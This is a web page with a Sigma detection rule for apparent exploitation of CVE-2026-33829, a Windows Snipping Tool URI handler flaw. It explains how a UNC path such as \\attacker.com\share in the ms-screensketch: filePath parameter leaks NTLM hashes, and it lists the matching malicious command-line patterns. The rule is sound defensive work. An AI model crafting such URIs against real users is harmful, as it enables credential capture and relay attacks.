Potential CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI
Detects potential exploitation of CVE-2026-33829, a vulnerability in the Windows Snipping Tool URI handler (ms-screensketch:). An attacker can abuse the 'filePath' parameter to supply a UNC path or HTTP URL, causing SnippingTool.exe to initiate a connection to a remote resource. When a UNC path is used (e.g. \\attacker.com\share), this triggers an outbound NTLM authentication attempt, allowing the attacker to capture or relay the victim's Net-NTLMv2 hash. HTTP-based paths may result in remote file loading or server-side request forgery (SSRF)-style access. The URI can be delivered via a malicious hyperlink, phishing email, or web page.
Convert In Phoenix Studio
Open this Sigma rule in the converter with the YAML preloaded and ready for backend selection.
Developed to detect an active or emerging threat. Prioritize investigation of any alerts and correlate with threat intelligence.
Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.
detection:
selection:
Image|endswith: '\SnippingTool.exe'
CommandLine|contains:
# '\\\\' = literal double backslash (UNC path start); '%5C' and '%%5C' are URL-encoded variations of the same backslash character
- 'ms-screensketch:edit?&filePath=\\\\'
- 'ms-screensketch:edit?&filePath=%%5C'
- 'ms-screensketch:edit?&filePath=%5C'
- 'ms-screensketch:edit?&filePath=http'
condition: selectionFalse positive likelihood has not been assessed. Additional context may be needed during triage.
Tactics
Techniques
Other